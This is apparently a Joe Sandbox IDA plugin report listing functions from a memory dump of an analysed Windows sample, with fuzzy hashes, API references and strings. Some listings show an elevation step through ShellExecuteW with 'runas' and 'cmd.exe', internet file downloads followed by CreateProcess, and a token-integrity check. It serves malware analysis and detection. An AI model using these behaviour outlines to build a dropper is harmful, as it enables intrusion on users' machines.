Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 106221d86f37327915f854e508ab7cf2b7c386f41e5bddc9ab3f3ccc52aa4611
Instruction ID: 01dd6e0fe30fa9e19685f770024209f09a21ca4cb2b079c8ef113e433f535b4b
Opcode Fuzzy Hash: 106221d86f37327915f854e508ab7cf2b7c386f41e5bddc9ab3f3ccc52aa4611
Instruction Fuzzy Hash: C7B18D75614608DFD719CF28C88AB657BE0FF46364F298659E899CF2E1C335EA81CB40

Function 00197B48 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00197B5E

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: fa18c139d0a8d6f54aee278fcda181a9514d70647ca3aa9567dd9ceeb7dcfaef
Instruction ID: e94af37bbff1aa16fe3acacc9cbcb9d82406be34d22c26081a62998fa9287d95
Opcode Fuzzy Hash: fa18c139d0a8d6f54aee278fcda181a9514d70647ca3aa9567dd9ceeb7dcfaef
Instruction Fuzzy Hash: 9F516EB1A242058FEF19CF69E8857AEBBF1FF48310F24862AD405EB694D7749984CF50

Function 0019BAFC Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

0, xrefs: 0019BC8D

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: bc93169fa2693e196e488ce84e064b5908f1bc722d26abee2511c273bbe59658
Instruction ID: 602bae65053a69c531056924fc2b1ed739ca70691c300867bbfce3fdd86ec9a8
Opcode Fuzzy Hash: bc93169fa2693e196e488ce84e064b5908f1bc722d26abee2511c273bbe59658
Instruction Fuzzy Hash: 5CD1ED30A0860A8FCF28DF68E6C4ABAB7F1FF48324F14461DD5569B695C730AD41CB91

Function 0019F905 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d181761632e51b1f7a78a043a4ee37398bdc4697bbc821391b7e2c66a09525
Instruction ID: b7fcfe9bab2834a166e358c3ab19e4d841f6e7ed77ddfc0e46036da8ed4bac93
Opcode Fuzzy Hash: 53d181761632e51b1f7a78a043a4ee37398bdc4697bbc821391b7e2c66a09525
Instruction Fuzzy Hash: 7B31C176900219BFDF20DFA9CC89EBBB76DEB84354F1441A8F805D7240EB30AE418B50

Function 00194B40 Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

need dictionary, xrefs: 00194EC4

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID:
String ID: need dictionary
API String ID: 0-853443464
Opcode ID: b880e4970e9d9552cc8ca38e38ae544db074179ee3bb368a60ea92d32744a8ef
Instruction ID: 1b24ae35e38314b72e71cdcc5a21b09cfcd05cb9898d845d3f9d57564818c442
Opcode Fuzzy Hash: b880e4970e9d9552cc8ca38e38ae544db074179ee3bb368a60ea92d32744a8ef
Instruction Fuzzy Hash: 09C1F3756006008FDB74CF5AC880B22B7F4FF59311B258A9ED89ACB651D776E846CF50

Function 00197A11 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007A1D,00197271), ref: 00197A16

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5ab5f54d8d4bbd7fb8a08901a5d87860358aed32a742a914c4da116ef1f4d8ef
Instruction ID: c3f3f23b4f2ce19fc6f4081adaaa0f5f0a36a2d107d49c6ef88bdee2a265da7c
Opcode Fuzzy Hash: 5ab5f54d8d4bbd7fb8a08901a5d87860358aed32a742a914c4da116ef1f4d8ef
Instruction Fuzzy Hash:

Function 00192FB0 Relevance: 1.0, Instructions: 993COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e05ed9c9dce19270f03e9914148e59c982ab936f08396a6d4802ccb5b3ec7af8
Instruction ID: fbcd94b5f61dbb7a59b0dd5b9a8e6ebabb08a0fb9c45de1e78850161f397fc61
Opcode Fuzzy Hash: e05ed9c9dce19270f03e9914148e59c982ab936f08396a6d4802ccb5b3ec7af8
Instruction Fuzzy Hash: BB92B4B5E00219DFCF04CF98C980AADBBF1FF48314F2582A9D519AB351D775AA42CB90

Function 00193C20 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dda35542aef01e9bd15e3423ddf8221511b9bb978b7181f054b342ef80eb40d
Instruction ID: 05d8f27075ded917746e8301ceb0c61045bdeeb2ba09e0f0a4c63b2a046ded22
Opcode Fuzzy Hash: 7dda35542aef01e9bd15e3423ddf8221511b9bb978b7181f054b342ef80eb40d
Instruction Fuzzy Hash: 15F1F635E002298FDF24CF28C990B99B7B1BF89314F1481EAD95DA7345DB30AE858F51

Function 00194580 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c47789b5ec69784e5544c60a2bbb7371161004a3ffeba16dca0afe8da0319c2d
Instruction ID: 0728b8f9fe7e42bfbc956a172a7adbd1ecdef83cc4cd70733761539ca9a3b627
Opcode Fuzzy Hash: c47789b5ec69784e5544c60a2bbb7371161004a3ffeba16dca0afe8da0319c2d
Instruction Fuzzy Hash: 102145705240B14A870C4B29AC72432FBD1DB4721278B47BFE986DA4CAC52BE564D7A0

Function 00192520 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00192534
HeapAlloc.KERNEL32(00000000), ref: 0019253D
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0019254A
GetProcessHeap.KERNEL32(00000008,0000026A), ref: 00192557
HeapAlloc.KERNEL32(00000000), ref: 0019255A
wsprintfW.USER32 ref: 00192567
ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000,00000000,00000000), ref: 00192587
GetProcessHeap.KERNEL32(00000000,?), ref: 00192593
HeapFree.KERNEL32(00000000), ref: 0019259C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001925A1
HeapFree.KERNEL32(00000000), ref: 001925A4
ExitProcess.KERNEL32 ref: 001925A8

Strings

runas, xrefs: 00192580
/c "%s", xrefs: 00192561
cmd.exe, xrefs: 0019257B

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: Heap$Process$AllocFree$ExecuteExitFileModuleNameShellwsprintf
String ID: /c "%s"$cmd.exe$runas
API String ID: 3385381366-213241364
Opcode ID: 9ba07524a63d221d229765c6b303167b4b5bbb9cef4c948c8788e53075d11543
Instruction ID: 2bd1d20c831660f11f2818f164451aa6e17717b4ef2ae39a86bfedae58bac479
Opcode Fuzzy Hash: 9ba07524a63d221d229765c6b303167b4b5bbb9cef4c948c8788e53075d11543
Instruction Fuzzy Hash: AF01FF71E803147AEA1067B55D4EF5B7E6CFB4AB91F100040F708AB5D1CAB459809AB5

Function 00191860 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 157memoryprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 001925B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 001925E1
Part of subcall function 001925B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 001925FB
Part of subcall function 001925B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00192644
Part of subcall function 001925B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0019265A
Part of subcall function 001925B0: HeapAlloc.KERNEL32(00000000), ref: 0019265D
Part of subcall function 001925B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 001926AA
Part of subcall function 001925B0: RtlAllocateHeap.NTDLL(00000000), ref: 001926AD
Part of subcall function 001925B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 001926D7
Part of subcall function 001925B0: RtlFreeHeap.NTDLL(00000000), ref: 001926DA
Part of subcall function 001925B0: InternetCloseHandle.WININET(?), ref: 001926E6
Part of subcall function 001925B0: InternetCloseHandle.WININET(?), ref: 001926F3

GetProcessHeap.KERNEL32(00000000,0000020A), ref: 001918A0
HeapAlloc.KERNEL32(00000000), ref: 001918A3
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000), ref: 001918B6

Part of subcall function 00196DD0: GetCurrentDirectoryW.KERNEL32(00000103,00000244,?,?,?,00000000,000000FF), ref: 00196E5D

GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 00191989
HeapAlloc.KERNEL32(00000000), ref: 0019198C
PathCombineW.SHLWAPI(00000000,?,?), ref: 001919AA
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,00000000,00000000), ref: 00191A1A
CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00191A2A
CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00191A36
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00191A45
HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 00191A48

Strings

D, xrefs: 001919E9
.#v, xrefs: 00191A2A, 00191A36

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: Heap$Process$Internet$CloseHandle$Alloc$FreeOpenPath$AllocateCombineCreateCurrentDirectoryFileFolderReadSpecial
String ID: D$.#v
API String ID: 2613224297-1552311974
Opcode ID: 4a9821cce4297dc07ccb722dea4107e73d83c958b8e19abd8e4c78b7934cc680
Instruction ID: e8f065da4eec681e560f0ef1f7b24fd7e7d3fe84140eb8fe180d0512236cf662
Opcode Fuzzy Hash: 4a9821cce4297dc07ccb722dea4107e73d83c958b8e19abd8e4c78b7934cc680
Instruction Fuzzy Hash: A451E171A01219ABDF20AF64CD59BAA77B8FF45744F1001A9F54AAB290EB709DC4CF50

Function 00198CBB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00198DDA
___TypeMatch.LIBVCRUNTIME ref: 00198EE8
_UnwindNestedFrames.LIBCMT ref: 0019903A
CallUnexpected.LIBVCRUNTIME ref: 00199055

Strings

csm, xrefs: 00198E11
csm, xrefs: 00198D65
csm, xrefs: 00198CF8

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 52297233698539cd10dca8b49332d573e8e65a26b49f10b01b6a1b1d8d68e1ae
Instruction ID: af6bddf714bb2905a729f6d7b8ec2c28198ec3b330fb35a9001ed25b6cd5701c
Opcode Fuzzy Hash: 52297233698539cd10dca8b49332d573e8e65a26b49f10b01b6a1b1d8d68e1ae
Instruction Fuzzy Hash: 33B18C71800209EFCF29DFA8C8819AEBBB5FF26314F14415AF8156B256DB31DA51CF92

Function 0019E03E Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0019E0C4

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
Instruction ID: b752572662e7da2f69c86645c692cb273fb5e12ad6c3bdeb43b0a952835a0c1d
Opcode Fuzzy Hash: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
Instruction Fuzzy Hash: 48B12472A002559FDF15CF68CC82BBE7BE9FF66750F184165E904AB282D7749A01CBA0

Function 00198540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00198577
___except_validate_context_record.LIBVCRUNTIME ref: 0019857F
_ValidateLocalCookies.LIBCMT ref: 00198608
__IsNonwritableInCurrentImage.LIBCMT ref: 00198633
_ValidateLocalCookies.LIBCMT ref: 00198688

Strings

csm, xrefs: 0019861D

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d7825b001130b67fb98bfabd4b6091a69be80901d090d1f2505d59883c932f5e
Instruction ID: 890f012d7da3723b3d2f8153ae3ce6df058379b2c232c2a307292dae464fbdbd
Opcode Fuzzy Hash: d7825b001130b67fb98bfabd4b6091a69be80901d090d1f2505d59883c932f5e
Instruction Fuzzy Hash: 5841B934A00208EBCF10DF69CC84A9EBBB5BF46314F158159E8199F392DB31ED55CB91

Function 001A11E3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,001A12F2,C6C014CA,0000044C,00000000,00000000,?,?,001A144C,00000022,FlsSetValue,001AB244,001AB24C,00000000), ref: 001A12A4

Strings

api-ms-, xrefs: 001A123A
ext-ms-, xrefs: 001A124E

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: f110102ab4120360c5ac232de547defe68794657413dd7fbf6c7e3496a9e7e61
Instruction ID: d61a9cc474b66f0fe47420060058cb44645f704b3d380a17a54591f23b068872
Opcode Fuzzy Hash: f110102ab4120360c5ac232de547defe68794657413dd7fbf6c7e3496a9e7e61
Instruction Fuzzy Hash: FE21D27AA00211BBDB229B64EC45B5A37A8EF537B0F350522ED11E7295DB30ED41C6E0

Function 00198984 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0019897B,001984E3,00197A61), ref: 00198992
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001989A0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001989B9
SetLastError.KERNEL32(00000000,0019897B,001984E3,00197A61), ref: 00198A0B

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5271957803fa4e06d20bab74ff12af395351725f9409385178cbc2470be18828
Instruction ID: fb7dca764c084f76bdfeaab26ac9ff95dcb8b6903e264b2159a07017b3c73dab
Opcode Fuzzy Hash: 5271957803fa4e06d20bab74ff12af395351725f9409385178cbc2470be18828
Instruction Fuzzy Hash: DC01F73361C3156EEE2537B87C86E2A2B49FB63778730032EF111460E1EF224C459291

Function 0019D007 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C6C014CA,?,?,00000000,001A861B,000000FF,?,0019CFE3,0019D0C7,?,0019CFB7,00000000), ref: 0019D03C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0019D04E
FreeLibrary.KERNEL32(00000000,?,?,00000000,001A861B,000000FF,?,0019CFE3,0019D0C7,?,0019CFB7,00000000), ref: 0019D070

Strings

mscoree.dll, xrefs: 0019D035
CorExitProcess, xrefs: 0019D046

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e8e2dea7fe3d3ba23b2e48934d1c20ca12791a5d87fc03f4a2b251351949f5a3
Instruction ID: 5b34ec23e501fbd66fe46265aa64806390faa54bcacc3152e2fb65e30bed73e0
Opcode Fuzzy Hash: e8e2dea7fe3d3ba23b2e48934d1c20ca12791a5d87fc03f4a2b251351949f5a3
Instruction Fuzzy Hash: B601D675A04619AFDF119F54DC09FAEBBB8FB45B20F144629F811E2AD0DB749880CA90

Function 001924B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 001924CC
OpenProcessToken.ADVAPI32(00000000), ref: 001924D3
GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 001924F3
CloseHandle.KERNEL32(?), ref: 00192502

Strings

.#v, xrefs: 00192502

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID: .#v
API String ID: 215268677-507759092
Opcode ID: bed2b4d90c22768b472ab724bf60999f0a6e667c67a234aebdb170ec59eb9389
Instruction ID: a4fa943ca36a7e93ae3b2fe07582c2299f21dad989c05756bd60f8d301da8e79
Opcode Fuzzy Hash: bed2b4d90c22768b472ab724bf60999f0a6e667c67a234aebdb170ec59eb9389
Instruction Fuzzy Hash: 1301C971A0021CABEB10AFA4DD09AAEBBBCFF09745F514559FA11E7150DB709A44CB90

Function 001A45D0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 001A4655
__alloca_probe_16.LIBCMT ref: 001A471E
__freea.LIBCMT ref: 001A4785

Part of subcall function 0019DC7F: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,0019718C,00000000,?,00196E07,0000044C,C6C014CA,7622F380,00000000,00000000,000000FF,?,001914D5), ref: 0019DCB1

__freea.LIBCMT ref: 001A4798
__freea.LIBCMT ref: 001A47A5

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 901b08a56b7def64fb1f6d4aec1ec6000b5605c4c848258e7d5e16da2aa837c6
Instruction ID: 5eeac1f81e5f5cc18abf497da5082f5629329fcfab2be7334b4e5b77a9cea854
Opcode Fuzzy Hash: 901b08a56b7def64fb1f6d4aec1ec6000b5605c4c848258e7d5e16da2aa837c6
Instruction Fuzzy Hash: 3151B07A600286AFEB259EE5CC81EBB7BA9EFD7310F150529FD04D6251EBB0DC108660

Function 00199AA2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00199A53,00000000,?,001B2CE0,?,?,?,00199BF6,00000004,InitializeCriticalSectionEx,001A9D38,InitializeCriticalSectionEx), ref: 00199AAF
